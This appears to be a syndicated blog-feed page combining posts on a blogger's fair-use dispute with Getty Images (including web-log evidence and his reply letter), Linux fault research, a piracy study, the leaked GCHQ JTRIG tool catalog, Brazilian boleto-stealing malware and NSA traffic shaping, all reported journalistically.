Getty Images is leading the way in creating a more visual world. Our new embed feature makes it easy, legal, and free for anybody to share some of our images on websites, blogs, and social media platforms.
http://www.gettyimages.com/Creative/Frontdoor/embed

(c)2014 Getty Images, Inc.

PRIVILEGED AND CONFIDENTIAL
This message may contain privileged or confidential information and is intended only for the individual named. If you are not the named addressee or an employee or agent responsible for delivering this message to the intended recipient you should not disseminate, distribute or copy this e-mail or any attachments hereto. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail and any attachments from your system without copying or disclosing the contents. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. Getty Images, 605 5th Avenue South, Suite 400. Seattle WA 98104 USA, www.gettyimages.com. PLEASE NOTE that all incoming e-mails will be automatically scanned by us and by an external service provider to eliminate unsolicited promotional e-mails (“spam”). This could result in deletion of a legitimate e-mail before it is read by its intended recipient at our firm. Please tell us if you have concerns about this automatic filtering.

Mark Rasch also pointed out that Getty explicitly copyrighted their email to me. However, the same Fair Use that permits me to use their pictures also permits me to post their entire email message. And that whole “PRIVILEGED AND CONFIDENTIAL” paragraph? That’s garbage and can be ignored because I never agreed to their terms.

Findings

In preparing to file the Copyright Declaratory Judgment, I performed my due diligence by checking web logs and related files for information pertaining to this case. And since Getty has recanted, I am making some of my findings public.

Automated Filing
First, notice how Getty’s second letter says “We have reviewed your email and website…” This clearly shows up in my web logs. Among other things, people at Getty are the only (non-bot) visitors to access my site via “nealkrawetz.org” — everyone else uses “hackerfactor.com”. In each case, the Getty users initially went directly to my “In The Flesh” blog entry (showing that they were not searching or just browsing my site.) Their automated violation bot also used nealkrawetz.org. The big catch is that nobody at Getty ever reviewed “In The Flesh” prior to mailing their extortion letter.

In fact, I can see exactly when their bot visited my web site. Here are all of my logs related to their bot:

2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-08 23:41:44 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-09 21:08:00 | 14.102.40.242 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371654690
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:36 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-14 23:05:44 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/archives/423-In-The-Flesh.html | http://ops.picscout.com/QcApp/PreReport/Index/371842247?normalFlow=True
2014-06-14 23:06:39 | 109.67.106.4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 | GET /blog/index.php?/categories/18-Phones | http://ops.picscout.com/QcApp/Infringer/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247
2014-06-16 05:35:47 | 95.35.10.33 | Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 | GET / | http://ops.picscout.com/QcApp/Classification/Index/371842247

This listing shows:

  • The date/time (in PST)
  • The bot’s IP address (two in Israel and one in India; none from the United States)
  • The user-agent string sent by the bot
  • Where they went — they most went to “/” (my homepage), but there is exactly one that went to “/blog/index.php?/archives/423-In-The-Flesh.html”. That’s when they compiled their complaint.
  • The “Referer” string, showing what they clicked in order to get to my site. Notice how their accesses are associated with a couple of complaint numbers. “371842247″ is the number associated with their extortion letter. However, “371654690″ appears to be a second potential complaint.

Getty’s complaint has a very specific timestamp on the letter. It’s doesn’t just have a date. Instead, it says “7/10/2014 11:05:05am” — a very specific time. The clocks may be off by a few seconds, but that “11:05″ matches my log file — it is off by exactly 12 hours. (The letter is timestamped 11:05am, and my logs recorded 11:05pm.) This shows that the entire filing process is automated.

When I use my bank’s online bill-pay system, it asks me when I want to have the letter delivered. Within the United States, it usually means mailing the letter four days earlier. I believe that Getty did the exact same thing. They scanned my web site and then mailed their letter so it would be delivered exactly one-month later, and dated the letter 4 days 12 hours before delivery.

Getty’s automated PicScout system is definitely a poorly-behaved web bot. At no time did Getty’s PicScout system retrieve my robots.txt file, showing that it fails to abide by Internet standards. I am also certain that this was a bot since a human’s web browser would have downloaded my blog’s CSS style sheet. (PicScout only downloaded the web page.)

Failure to perform due diligence
I want to emphasize that there are no other accesses to that blog entry by any address associated with Getty within months before their complaint. As of this year (from January 2014 to July 23, 2014), people at Getty have only visited the “In The Flesh” web page 13 times: once by the PicScout bot, and 12 times after they received my reply letter. This shows that Getty never viewed the web page prior to sending their letter. In effect, their “infringement” letter is nothing more than trolling and an attempt to extort money. They sent the letter without ever looking at the context in which the picture is used.

My claim that Getty never manually reviewed my web site prior to mailing is also supported by their second letter, where they recanted their claim of copyright infringement. Having actually looked at my blog, they realized that it was Fair Use.

My web logs are not my only proof that no human at Getty viewed the blog page in the months prior to sending the complaint. Getty’s threatening letter mentions only one single picture that is clearly labeled with Getty’s ImageBank watermark. However, if any human had visited the web page, then they would have seen FOUR pictures that are clearly associated with Getty, and all four pictures were adjacent on the web page! The four pictures are:

The first picture clearly says “GettyImages” in the top left corner. The second picture (from their complaint) is watermarked with Getty’s ImageBank logo. The third and fourth pictures come from Getty’s iStockPhoto service. Each photo was properly used as part of the research results in that blog entry. (And right now, they are properly used in the research findings of this blog entry.)

After Getty received my reply letter, they began to visit the “In The Flesh” URL from 216.169.250.12 — Getty’s corporate outbound web proxy address. Based on the reasonable assumption that different browser user-agent strings indicate different people, I observed them repeatedly visiting my site in groups of 3-5 people. Most of them initially visited the “In The Flesh” page at nealkrawetz.org; a few users visited my “About Me” and “Services” web pages. I am very confident that these indicate their attorneys reviewing my reply letter and web site. This is the absolute minimum evaluation that Getty should have done before sending their extortion letter.

Legal Issues
Besides pointing out how my blog entry clearly falls under Fair Use, my attorney noted a number of items that I (as a non-lawyer person) didn’t see. For example:

  • In Getty’s initial copyright complaint, they assert that they own the copyright. However, the burden of proof is on Getty Images. Getty provided no proof that they are the actual copyright holder, that they acquired the rights legally from the photographer, that they never transferred rights to anyone else, that they had a model release letter from the woman in the photo, that the picture was never made public domain, and that the copyright had not expired. In effect, they never showed that they actually have the copyright.

  • Getty’s complaint letter claims that they have searched their records and found no license for me to use that photo. However, they provided no proof that they ever searched their records. At minimum, during discovery I would demand a copy of all of their records so that I could confirm their findings and proof of their search. (Remember, the burden of proof is on Getty, not on me.) In addition, I have found public comments that explicitly identify people with valid licenses who reported receiving these hostile letters from Getty. This brings up the entire issue regarding how Getty maintains and searches their records.
  • Assuming some kind of violation (and I am not admitting any wrong here), there is a three-year statute of limitations regarding copyright infringement. My blog entry was posted on March 18, 2011. In contrast, their complaint letter was dated July 10, 2014 — that is more than three years after the pictures were posted on my site.

Known Research
Copyright law permits Fair Use for many purposes, including “research”. Even Getty’s own FAQ explicitly mentions “research” as an acceptable form of Fair Use. The question then becomes: am I a researcher and does my blog report on research? (Among other things, this goes toward my background section in the Copyright Declaratory Judgment filing.)

As it turns out, my web logs are extremely telling. I can see each time anyone at any network address associated with Getty Images visits my site. For most of my blog entries, I either get no Getty visitors or a few visitors. However, each time I post an in-depth research entry on digital photo forensics, I see large groups of people at Getty visiting the blog entry. I can even see when one Getty person comes through, and then a bunch of other Getty people visit my site — suggesting that one person told his coworkers about the blog entry. In effect, employees at Getty Images have been regular readers of my blog since at least 2011. (For discovery, I would request a forensic image of every computer in Getty’s company that has accessed my web site in order to determine if they used my site for research.)

Getty users also use my online analysis service, FotoForensics. This service is explicitly a research service. There are plenty of examples of Getty users accessing the FotoForensics site to view analysis images, read tutorials, and even upload pictures with test files that have names like “watermark.jpg” and “watermark-removed.jpg”. This explicitly shows that they are using my site as a research tool.

(For the ultra paranoid people: I have neither the time nor the desire to track down every user in my web logs. But if you send me a legal threat, I will grep through the data.)

However, the list does not stop there. For example, the Harvard Reference Guide lists me as the example for citing research from a blog. (PDF: see PDF page 44, document page 42.) Not only does Getty use my site as a research resource, Harvard’s style guide uses me as the example for a research blog (my bold for emphasis).

Blogs are NOT acceptable academic sources unless as objects of research

Paraphrasing, Author Prominent:
Krawetz (2011) uses a blog to discuss advanced forensic image analysis techniques.

Paraphrasing, Information Prominent:
Blogs may give credence to opinion, in some cases with supporting evidence; for example the claim that many images of fashion models have been digitally enhanced (Krawetz 2011).

Reference List Model:
Krawetz, N 2011, ‘The hacker factor blog’, web log, viewed 15 November 2011, http://www.hackerfactor.com/blog/

I should also point out that the AP and Reuters have both been very aware of my blog — including a VP at the AP — and neither has accused me of copyright infringement. They appear to recognize this as Fair Use. Moreover, with one of blog entries on a Reuters photo (Without a Crutch), a Reuters editor referred to the blog entry as a “Great in-depth analysis” on Reuter’s web site (see Sep 30, 2011) and on her twitter feed. This shows that Getty’s direct competition recognize my blog as a research resource.

SLAPP
One of the things my attorney mentioned was California’s Anti-SLAPP law. Wikipedia explains SLAPP, or Strategic Lawsuit Against Public Participation, as “a lawsuit that is intended to censor, intimidate, and silence critics by burdening them with the cost of a legal defense until they abandon their criticism or opposition.” Wikipedia also says:

The plaintiff’s goals are accomplished if the defendant succumbs to fear, intimidation, mounting legal costs or simple exhaustion and abandons the criticism. A SLAPP may also intimidate others from participating in the debate. A SLAPP is often preceded by a legal threat. The difficulty is that plaintiffs do not present themselves to the Court admitting that their intent is to censor, intimidate or silence their critics.

In this case, Getty preceded to send me a legal threat regarding alleged copyright infringement. Then they demanded $475 and threatened more actions if I failed to pay it. In contrast, it would cost me $400 to file for a Declaratory Judgment (more if I lived in other states), and costs could rise dramatically if Getty filed a lawsuit against me. In either scenario, it places a financial burden on me if I want to defend my First Amendment rights.

In the United States, California has special anti-SLAPP legislation. While not essential, it helps that Getty has offices in California and a network trace shows that some packets went from Getty to my blog through routers in California. As Wikipedia explains:

To win an anti-SLAPP motion, the defendant must first show that the lawsuit is based on claims related to constitutionally protected activities, typically First Amendment rights such as free speech, and typically seeks to show that the claim lacks any basis of genuine substance, legal underpinnings, evidence, or prospect of success. If this is demonstrated then the burden shifts to the plaintiff, to affirmatively present evidence demonstrating a reasonable probability of succeeding in their case by showing an actual wrong would exist as recognized by law, if the facts claimed were borne out.

This isn’t even half of his legal advice. I could barely take notes fast enough as he remarked about topics like Rule 11, tortious interference with a business relationship, Groucho Marx’s reply to Warner Brothers, and how Getty’s repeated access to my web site could be their way to inflate potential damage claims (since damages are based on the number of views).

A Little Due Diligence Goes A Long Way

Although this entire encounter with Getty Images took less than two weeks, I was preparing for a long battle. I even contacted the Electronic Freedom Foundation (EFF) to see if they could assist. The day after Getty recanted, I received a reply from the EFF: no less than four attorneys wanted to help me. (Thank you, EFF!)

I strongly believe that Getty Images is using a “cookie cutter” style of complaint and is not actually interested in any lawsuit; they just want to extort money from people who don’t know their rights or don’t have the fortitude for a long defense (SLAPP). Getty Images made no effort to evaluate the content beyond an automated search bot, made no attempt to review the bot’s results, provided no evidence that they are the copyright holder, provided no proof that they tried to verify licenses, and threatened legal action against me if I did not pay up.

I am glad that I stood up for my First Amendment rights.

LWN.net: Faults in Linux 2.6

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

Six researchers (including Julia Lawall of the Coccinelle project) have just released a paper [PDF] (abstract) that looks at the faults in the 2.6 kernel. “In August 2011, Linux entered its third decade. Ten years before, Chou et al. published a study of faults found by applying a static analyzer to Linux versions 1.0 through 2.4.1. A major result of their work was that the drivers directory contained up to 7 times more of certain kinds of faults than other directories. This result inspired numerous efforts on improving the reliability of driver code. Today, Linux is used in a wider range of environments, provides a wider range of services, and has adopted a new development and release model. What has been the impact of these changes on code quality? To answer this question, we have transported Chou et al.’s experiments to all versions of Linux 2.6; released between 2003 and 2011. We find that Linux has more than doubled in size during this period, but the number of faults per line of code has been decreasing. Moreover, the fault rate of drivers is now below that of other directories, such as arch. These results can guide further development and research efforts for the decade to come. To allow updating these results as Linux evolves, we define our experimental protocol and make our checkers available.
(Thanks to Asger Alstrup Palm.)

LWN.net: [$] Genealogy research with Gramps

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

alt="[Visualization in Gramps]" width=200 height=112/>

Genealogy is a fairly popular pursuit, and those wishing to use open-source
software in their hobby have their choice cut-out for them—Gramps is the only complete, actively-developed free-software solution. The project was started in 2001 and
initially known as GRAMPS; the first
stable release
was in 2004. The
latest, version 4.1.0 (“Name go in
book”) was
released on June 18.

Schneier on Security: Security Against Traffic Analysis of Cloud Data Access

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Here’s some interesting research on foiling traffic analysis of cloud storage systems.

Press release.

The Hacker Factor Blog: Dear Getty Images Legal Department

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few years, Getty Images has operated an aggressive anti-copyright infringement campaign. In 2011, they purchased PicScout to search the Internet for potential unlicensed uses of their pictures. Then they began sending out very scary-sounding takedown notices. These letters include a “cease and desist” paragraph as well as a bill for the unauthorized use.

I just received one of these letter. Here’s the 7-page (3.4 MB) letter: PDF. (The only thing I censored was the online access code for paying online.) They billed me $475 for a picture used on my blog. (If you log into their site, it’s $488 with tax.)

A number of news outlets as well as the blogosphere have begun reporting on these letters from Getty Images. For example:

  • International Business Times: “Getty Images Lawsuits: Enforcement Or Trolling? Fear Of Letters Dwindling, Stock-Photo Giant Hits Federal Courts”

  • The DG Group: “Image Copyright Infringement And Getty Images Scam Letter”
  • Extortion Letter Info: “Reporting on Getty Images & Stock Photo Settlement Demand Letters (Copyright Trolls, ‘Extortion’ Letters, ‘Shadown’ Letters)”
  • Women in Business: “Are You Being Set Up For Copyright Infringement? As Technology Becomes More Invasive Copyright Infringement Scams Flourish”
  • RyanHealy.com: “Getty Images Extortion Letter”
  • someguy72 @ Reddit: He states that he purchased the pictures legally from Getty and still received an infringement notice. His advice: if you purchase a picture from Getty, the “save your records FOREVER… they will come after you, years later and you might not have PROOF of PURCHASE, and then you will be screwed.”

As far as I can tell, this is an extortion racket. (I’m surprised that there hasn’t been a class-action lawsuit against Getty Images yet.) The basic premise is that they send out a threatening letter with a price tag. Some people will fear the strongly-worded letter and simply pay the amount. If you ignore it, then they send more letters with greater dollar amounts. If you call them up, the forums say that you can usually negotiate a lower amount. However, sometimes you may not actually owe anything at all.

Many people have reported that, if you just ignore it, then it goes away. However, Getty Images has sued a few people who ignored the letters. If you ignore it, then you place yourself at risk.

But here’s the thing… There are some situations where you can use the image without a license. It is in the Copyright law under the heading “Fair Use” (US Copyright Law Title 17 Section 107; in some countries, it’s called “Fair Dealing”). This is an exception from copyright enforcement. Basically, if you’re using the picture as art on your web site or to promote a product, then you are violating their copyright. (You should negotiate a lower rate.) However, if you use it for criticism, comment, news reporting, teaching, scholarship, or research, then you are allowed to use the picture.

For example, I have many blog entries where I forensically evaluate pictures. I do this to show techniques, criticize content, identify deceptive practices, etc. If Fair Use did not exist, then I would be unable to criticize or expose deception from media outlets. In effect, they would be censoring my freedom of speech by preventing me from directly addressing the subject.

Reply To Getty

The picture in question is one that is on an older blog entry: In The Flesh. This blog entry criticizes the media outlets Time and Salon for promoting misleading and hostile software. (It’s hostile because the demo software installs malware.) The software, False Flesh, claims to make people in any picture appear nude. The pictures in my blog entry are used to demonstrate some of the deceptive practices. Specifically, the pictures of nude women on the software’s web site did not come from their software.

I looked at the picture mentioned in Getty’s complaint and how it was being used in the blog entry. I really thought it was permitted under Copyright Fair Use. However, I’m not an attorney. So… I checked with an attorney about the Getty complaint and my use of the picture. I was actually surprised that he didn’t start his answer with “that depends…” (If you’ve every worked with an attorney, then you know any discussion about legality begins with them saying “that depends…”) Instead, he said outright “it’s clearly fair use.”

Personally, I’m offended that Getty Images made no attempt to look at the context in which the picture is used.

Rather than ignoring them, I sent them a letter:

Dr. Neal Krawetz
Hacker Factor
PO Box 270033
Fort Collins, CO
80527-0033

July 15, 2014

Legal Department
Getty Images
605 5th Ave S, Suite 400
Seattle, WA
98104

Dear Getty Images Legal Department,

I received your copyright infringement notification dated “7/10/2014 11:05:06 AM”, case number 371842247, on July 14, 2014. I have reviewed the image, the use of the picture on my web site, and discussed this situation with an attorney. It is my strong belief that I am clearly using the picture within the scope of Copyright Fair Use (Title 17 Section 107).

Specifically:

  • The blog entry, titled “In The Flesh”, criticizes the media outlets Time and Salon for promoting deceptive software. The software is called “False Flesh” and claims to turn any photo of a person into a nude. I point out that installing the False Flesh demo software will install malware.

  • The blog entry discloses research findings regarding the False Flesh software: there is no identified owner for the software and the sample pictures they use to demonstrate their software are not from their software. I specifically traced their sample images to pictures from sites such as Getty Images. I forensically evaluate the pictures and explicitly point out the misrepresentation created by these images on the False Flesh web site.
  • The picture is used on my web site to criticize the media reports by exposing fraud and misrepresentation associated with the product. It is also included as part of a demonstration for tracking and identifying potentially fraudulent products in general.
  • The blog entry reports on these findings to the public in order to educate people regarding the deceptive nature of False Flesh and the risks from using this software.
  • The image that you identified is not used is the blog entry to promote any products or services and is directly related to the comments, criticism, and research covered in the blog entry. The use is not commercial in nature. This goes toward the purpose and character, which is to identify fraud and misrepresentation in a product promoted by Time and Salon.
  • As described in the blog entry, I found sample images on the False Flesh web site and used TinEye and other forensic methods to identify the sources. This was used to prove that the False Flesh software did not generate any of their sample images.
  • I did not use the full-size version of this particular picture and it includes the Getty Images Image Bank watermark. The blog entry explicitly identifies that the source for the False Flesh picture was Getty Images and not False Flesh. I point out that False Flesh used the picture in a deceptive manner.
  • I believe that my use of this picture has no adverse effect on the potential market for the image.

I believe that this covers the Copyright Fair Use requirements for criticism, comment, teaching, research, and reporting.

Getty Images acknowledges Fair Use in their FAQ concerning license requirements:
http://company.gettyimages.com/license-compliance/faq/#are-there-limitations-on-a-copyright-owners-rights

Specifically, Getty Images calls out education and research. As a computer security and forensic researcher, I use this blog to describe tools and techniques, evaluate methodologies, and to identify deceptive practices. I believe that this specific blog entry, and my blog in general, clearly fit both of these areas.

As stated in this letter, the picture’s appearance on my blog is Fair Use and I have the right under copyright law to use the image without your consent. This letter serves as notice that any DMCA takedown or blocking notices to any third party would be in bad faith.

Sincerely,

/s/ Dr. Neal Krawetz

Chilling Effect

My blog in general reports on findings related to computer security and forensics. Many of these blog entries heavily focus on scams, fraud, and abuse from media outlets. Many of my blog entries (reports) have been repeated by news outlets, and some of my blog entries have had a direct effect on changing insecure and unethical practices. This includes a series of blog entries that exposed digital manipulation in World Press Photo’s annual contest (influencing changes in this year’s contest rules) and a paper on fundamental problems with credit card payment systems that lead to changes in the Visa security standards.

While this could be a wide-spread extortion racket, it could also be Getty’s way of testing the waters before going after some blog entries where I openly and explicitly criticize them for releasing digitally altered photos.

My primary concern is the chilling effect this could have. If I pay the extortion, then it opens me for more claims from Getty; I have previously criticized them for providing digitally altered photos and performed analysis to prove it. It also opens the way for similar claims from the Associated Press, Reuters, and every other media outlet that I have openly criticized. All of my blog entries that explicitly expose digital misrepresentation, report on media manipulation, and even those that disclose methods for evaluating content will be at risk.

In effect, bowing to this one threatening letter would force me to close my blog since I would no longer be allowed to freely write — report, comment, disclose research, and educate others — on topics related to media manipulation and digital photo analysis. I consider Getty’s attempt to censor my blog’s content to be an unacceptable attack on my freedom of speech.

LWN.net: Google’s “Project Zero”

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Google’s newly announced
Project Zero is focused on making the net as a whole safer from attackers.
We’re not placing any particular bounds on this project and will
work to improve the security of any software depended upon by large numbers
of people, paying careful attention to the techniques, targets and
motivations of attackers. We’ll use standard approaches such as locating
and reporting large numbers of vulnerabilities. In addition, we’ll be
conducting new research into mitigations, exploitation, program
analysis—and anything else that our researchers decide is a worthwhile
investment.
” Their policy of only reporting bugs to the vendor
looks like it could result in the burying of inconvenient vulnerabilities,
but presumably they have thought about that.

TorrentFreak: File-Sharing Doesn’t Hurt Box Office Revenue, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

piracy-progressResearch into online piracy comes in all shapes and sizes, often with equally mixed results. Often the main question is whether piracy is hurting sales.

A new study conducted by economist Koleman Strumpf is one of the most comprehensive on the subject so far.

Drawing on data from a popular BitTorrent tracker and revenue projections from the Hollywood Stock Exchange he researches how the release of a pirated movie affects expected box office income.

The research covers 150 of the most popular films that were released over a period of seven years, and the findings reveal that the release of pirated films on file-sharing sites doesn’t directly hurt box office revenue.

“There is no evidence in my empirical results of file-sharing having a significant impact on theatrical revenue,” Strumpf tells TorrentFreak in a comment.

“My best guess estimate is that file sharing reduced the first month box office by $200 million over 2003-2009, which is only three tenths of a percent of what movies actually earned. I am unable to reject the hypothesis that there is no impact at all of file-sharing on revenues.”

So while there is a small negative effect, this is limited to three tenth of a percent and not statistically significant.

Interestingly, the data also reveals that movie leaks shortly before the premiere have a small positive impact on expected revenues. This suggests that file-sharing may serve as a form of promotion.

“One consistent result is that file-sharing arrivals shortly before the theatrical opening have a modest positive effect on box office revenue. One explanation is that such releases create greater awareness of the film. This is also the period of heaviest advertising,” Strumpf notes.

One of the advantages of this study compared to previous research is that it measures the direct effect of a movie leak on projected box office revenues. Previous studies mostly compared early versus late leaks, which is less accurate and may be influenced by other factors.

“For example, suppose studios added extra security to big budget movies which then have a delayed arrival to file-sharing networks. Then even if file-sharing has no impact at all, one would find that delayed arrival on file-sharing leads to higher revenues,” Strumpf tells us.

Another upside of the research lies in the statistical precision. The data includes thousands of daily observations and relatively precise estimates, something lacking in most previous studies.

The downside, on the other hand, is that the expected box office impact is estimated from the Hollywood Stock Exchange. While this has shown to be a good predictor for actual revenues, it’s not a direct measurement.

In any case, the paper suggests that file-sharing might not be the biggest threat the movie industry is facing.

Even if the negative effects were twice as big as the data suggests, it would still be less than the $500 million Hollywood spent on the MPAA’s anti-piracy efforts during the same period.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: GCHQ Catalog of Exploit Tools

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

The latest Snowden story is a catalog of exploit tools from JTRIG (Joint Threat Research Intelligence Group), a unit of the British GCHQ, for both surveillance and propaganda. It’s a list of code names and short descriptions, such as these:

GLASSBACK: Technique of getting a targets IP address by pretending to be a spammer and ringing them. Target does not need to answer.

MINIATURE HERO: Active skype capability. Provision of real time call records (SkypeOut and SkypetoSkype) and bidirectional instant messaging. Also contact lists.

MOUTH: Tool for collection for downloading a user’s files from Archive.org.

PHOTON TORPEDO: A technique to actively grab the IP address of MSN messenger user.

SILVER SPECTOR: Allows batch Nmap scanning over Tor.

SPRING BISHOP: Find private photographs of targets on Facebook.

ANGRY PIRATE: is a tool that will permanently disable a target’s account on their computer.

BUMPERCAR+: is an automated system developed by JTRIG CITD to support JTRIG BUMPERCAR operations. BUMPERCAR operations are used to disrupt and deny Internet-based terror videos or other materials. The techniques employs the services provided by upload providers to report offensive materials.

BOMB BAY: is the capacity to increase website hits/rankings.

BURLESQUE: is the capacity to send spoofed SMS messages.

CLEAN SWEEP: Masquerade Facebook Wall Posts for individuals or entire countries.

CONCRETE DONKEY: is the capacity to scatter an audio message to a large number of telephones, or repeatedely bomb a target number with the same message.

GATEWAY: Ability to artificially increase traffic to a website.

GESTATOR: amplification of a given message, normally video, on popular multimedia websites (Youtube).

SCRAPHEAP CHALLENGE: Perfect spoofing of emails from Blackberry targets.

SUNBLOCK: Ability to deny functionality to send/receive email or view material online.

SWAMP DONKEY: is a tool that will silently locate all predefined types of file and encrypt them on a targets machine

UNDERPASS: Change outcome of online polls (previously known as NUBILO).

WARPATH: Mass delivery of SMS messages to support an Information Operations campaign.

HAVLOCK: Real-time website cloning techniques allowing on-the-fly alterations.

HUSK: Secure one-on-one web based dead-drop messaging platform.

There’s lots more. Go read the rest. This is a big deal, as big as the TAO catalog from December.

I would like to post the entire list. If someone has a clever way of extracting the text, or wants to retype it all, please send it to me.

EDITED TO ADD (7/16): HTML of the entire catalog is here.

Krebs on Security: Brazilian ‘Boleto’ Bandits Bilk Billions

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

With the eyes of the world trained on Brazil for the 2014 FIFA World Cup, it seems a fitting time to spotlight a growing form of computer fraud that’s giving Brazilian banks and consumers a run for their money. Today’s post looks at new research into a mostly small-time cybercrime practice that in the aggregate appears to have netted thieves the equivalent of billions of dollars over the past two years.

A boleto.

A boleto.

At issue is the “boleto” (officially “Boleto Bancario”), a popular payment method in Brazil that is used by consumers and for most business-to-business payments. Brazilians can use boletos to complete online purchases via their bank’s Web site, but unlike credit card payments — which can be disputed and reversed — payments made via boletos are not subject to chargebacks and can only be reverted by bank transfer.

Brazil has an extremely active and talented cybercrime underground, and increasingly Brazilian organized  crime gangs are setting their sights on boleto users who bank online. This is typically done through malware that lies in wait until the user of the hacked PC visits their bank’s site and fills out the account information for the recipient of a boleto transaction. In this scenario, the unwitting victim submits the transfer for payment and the malware modifies the request by substituting a recipient account that the attackers control.

Many of the hijacked boleto transactions are low-dollar amounts, but in the aggregate these purloined payments can generate an impressive income stream for even a small malware gang. On Tuesday, for example, a source forwarded me a link to a Web-based control panel for a boleto-thieving botnet (see screenshot below); in this operation, we can see that the thieves had hijacked some 383 boleto transactions between February 2014 and the end of June, but had stolen the equivalent of nearly USD $250,000 during that time.

The records kept by a boleto-stealing botnet. Next to the date and time is the account of the intended recipient of the transfer; the "linea alterada" column shows the accounts used by the thieves to accept diverted payments. "Valor" refers to the amount, expressed in Brazilian Real.

The records kept by a boleto-stealing botnet. Next to the date and time is the account of the intended recipient of the transfer; the “linha alterada” column shows the accounts used by the thieves to accept diverted payments. “Valor” refers to the amount, expressed in Brazilian Real.

But a recent discovery by researchers at RSA, the security division of EMC, exposes far more lucrative and ambitious boleto banditry. RSA says the fraud ring it is tracking — known as the “Bolware” operation — affects more than 30 different banks in Brazil, and may be responsible for up to $3.75 billion USD in losses. RSA arrived at this estimate based on the discovery of a similar botnet control panel that tracked nearly a half-million fraudulent transactions.

Most Brazilian banks require online banking customers to install a security plug-in that hooks into the user’s browser. The plug-ins are designed to help block malware attacks. But according to RSA, the Bolware gang’s malware successfully disables those security plug-ins, leaving customers with a false sense of security when banking online.

The malware also harvests usernames and passwords from victim PCs, credentials that are thought to be leveraged in spreading the malware via spam to the victim’s contacts. RSA said this fraud gang appears to have infected more than 192,000 PCs, and stolen at least 83,000 sets of user credentials.

Administration screen of the Bolware gang shows the original Boleto numbers "Bola Original" and their destination bank "Bola".  Image: RSA

Administration screen of the Bolware gang shows the original Boleto numbers “Bola Original” and their destination bank “Bola”. Image: RSA

RSA notes that the miscreants responsible for the Bolware operation appear to have used just over 8,000 separate accounts to receive the stolen funds. That’s roughly 7,997 more accounts than were used by the boleto bandits responsible for the diverted transactions in the boleto botnet control panel I discovered.

Researchers at RSA suggest that Brazilians who wish to transact in boletos online should consider using a mobile device to manage their boleto transactions, noting that boleto-thieving malware currently is not capable of altering the data stored in the barcode of each hijacked boleto order — at least for the time being.

“As the malware does not alter the barcode (for now), the safest approach is to use mobile banking applications available on smart phones (for now, immune to this malware) to read the barcode and to make payments,” the company said in its report (PDF) on this crime wave.

Schneier on Security: How Traffic Shaping Can Help the NSA Evade Legal Oversight

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

New research paper on how the NSA can evade legal prohibitions against collecting Internet data and metadata on Americans by forcing domestic traffic to leave and return to the US. The general technique is called “traffic shaping,” and has legitimate uses in network management.

From a news article:

The Obama administration previously said there had been Congressional and Judicial oversight of these surveillance laws — notably Section 215 of the Patriot Act, which authorized the collection of Americans’ phone records; and Section 702 of the Foreign Intelligence Surveillance Act (FISA), which authorized the controversial PRISM program to access non-U.S. residents’ emails, social networking, and cloud-stored data.

But the researchers behind this new study say that the lesser-known Executive Order (EO) 12333, which remains solely the domain of the Executive Branch — along with United States Signals Intelligence Directive (USSID) 18, designed to regulate the collection of American’s data from surveillance conducted on foreign soil — can be used as a legal basis for vast and near-unrestricted domestic surveillance on Americans.

The legal provisions offered under EO 12333, which the researchers say “explicitly allows for intentional targeting of U.S. persons” for surveillance purposes when FISA protections do not apply, was the basis of the authority that reportedly allowed the NSA to tap into the fiber cables that connected Google and Yahoo’s overseas to U.S. data centers.

An estimated 180 million user records, regardless of citizenship, were collected from Google and Yahoo data centers each month, according to the leaked documents. The program, known as Operation MUSCULAR, was authorized because the collection was carried out overseas and not on U.S. soil, the researchers say.

The paper also said surveillance can also be carried out across the wider Internet by routing network traffic overseas so it no longer falls within the protection of the Fourth Amendment.

We saw a clumsy example of this in 2013, when a bunch of Internet traffic was mysteriously routed through Iceland. That one was the result of hacking the Border Gateway Protocol (BGP). I assure you that the NSA’s techniques are more effective and less obvious.

